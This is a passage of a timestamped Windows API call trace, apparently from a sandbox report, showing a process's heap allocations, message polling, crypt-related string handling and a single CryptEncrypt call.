wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0133.645] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0133.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0133.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0133.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0133.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0133.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0133.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0133.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0133.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0133.646] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0133.646] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0133.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0133.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0133.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0133.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0133.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0133.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0133.646] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0133.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0133.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0133.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0133.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0133.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0133.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0133.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0133.647] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0133.647] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0133.647] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0133.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0133.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0133.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0133.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0133.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0133.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0133.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0133.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0133.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0133.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0133.648] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0133.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0133.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0133.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0133.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0133.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0133.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0133.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0133.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0133.648] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0133.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0133.648] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0133.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0133.649] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0133.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0133.649] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0133.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0133.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0133.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0133.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0133.649] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0133.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0133.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80220 [0133.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0133.649] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0133.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80220 | out: hHeap=0x970000) returned 1 [0133.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0133.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0133.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0133.649] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0133.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0133.649] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.649] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0133.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0133.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0133.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0133.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0133.650] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0133.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0133.650] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0133.650] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0133.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0133.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0133.650] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0133.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0133.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0133.650] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0133.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0133.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0133.650] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0133.650] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0133.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.650] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77ac8 [0133.650] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0133.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.651] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0133.651] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0133.651] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0133.651] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0133.652] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0133.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0133.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0133.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0133.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0133.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0133.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0133.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0133.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0133.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0133.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0133.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0133.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0133.653] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0133.656] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0133.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0133.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e509c8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0133.657] CryptEncrypt (in: hKey=0xa87610, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x13fbd, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x13fc0) returned 1 [0133.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0133.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0133.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0133.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0133.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0133.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0133.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0133.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0133.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0133.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0133.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0133.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0133.657] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0133.658] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0133.659] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 